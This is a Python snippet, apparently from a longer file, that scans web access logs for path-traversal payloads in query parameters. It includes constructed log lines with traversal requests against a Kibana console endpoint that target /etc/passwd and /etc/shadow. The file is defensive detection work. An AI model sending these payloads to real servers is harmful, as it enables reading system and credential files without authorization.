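# Constructed log lines in common log format; only the request targets are
# taken from the write-up, everything else is made up for the example.
SAMPLE_LOG = """\
10.18.78.136 - - [24/Dec/2019:10:01:02 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 512
10.18.78.136 - - [24/Dec/2019:10:01:09 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../.../../../../etc/passwd HTTP/1.1" 200 2048
10.18.78.136 - - [24/Dec/2019:10:01:15 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 1024
10.18.78.136 - - [24/Dec/2019:10:02:00 +0000] "GET /app/kibana HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# two or more dots followed by a slash or backslash: "../", ".../", "..\" and friends
TRAVERSAL_RE = re.compile(r"\.{2,}[\\/]")


def traversal_params(target: str) -> Dict[str, str]:
    """Return the query parameters whose decoded value contains a traversal sequence."""
    hits: Dict[str, str] = {}
    query = urlsplit(target).query
    # parse_qs already percent-decodes once; unquote again for double encoding
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            if TRAVERSAL_RE.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(log: str) -> List[dict]:
    """Scan log lines and return one alert per request carrying a traversal payload."""
    alerts = []
    for line in log.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = traversal_params(match.group("target"))
        if hits:
            alerts.append({"target": match.group("target"), "params": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["params"], "in", alert["target"])
```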